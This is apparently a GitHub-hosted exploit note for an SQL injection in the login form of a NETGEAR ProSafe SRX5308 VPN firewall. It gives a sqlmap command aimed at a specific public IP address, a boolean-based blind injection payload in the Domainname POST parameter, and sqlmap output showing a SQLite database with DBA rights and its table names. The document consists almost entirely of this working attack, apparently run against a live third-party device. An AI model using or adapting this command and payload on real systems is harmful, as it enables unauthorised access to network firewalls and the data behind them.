-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathVulnerability
35 lines (28 loc) · 1.24 KB
/
Vulnerability
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# Exploit Title: NETGEAR ProSafe™ Gigabit Quad WAN SSL VPN Firewall SRX5308 | SQL Injection Vulnerability
# Author: Чингис хаан
# Tested On: Kali Linux
# sqlmap -u "https://95.128.69.5/scgi-bin/platform.cgi" --form --current-db --dbs --banner --batch
---------------------------------------------------------------------------------------------------
NETGEAR ProSafe™ Gigabit Quad WAN SSL VPN Firewall SRX5308
NETGEAR ProSafe™ - NETGEAR Configuration Manager Login
https://95.128.69.5/scgi-bin/platform.cgi
---
Parameter: USERDBDomains.Domainname (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: thispage=index.htm&USERDBUsers.UserName=oTcy&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain' AND 2477=2477 AND 'GOgI'='GOgI&button.login.USERDBUsers.router_status=Login&Login.userAgent=SmwH
Vector: AND [INFERENCE]
---
the back-end DBMS: SQLite
the back-end DBMS is SQLite
current user is DBA: True
available databases [1]:
[+] SQLite_masterdb
Database: SQLite_masterdb
[4 tables]
+----------+
| system |
| logging |
| services |
| zones |
+----------+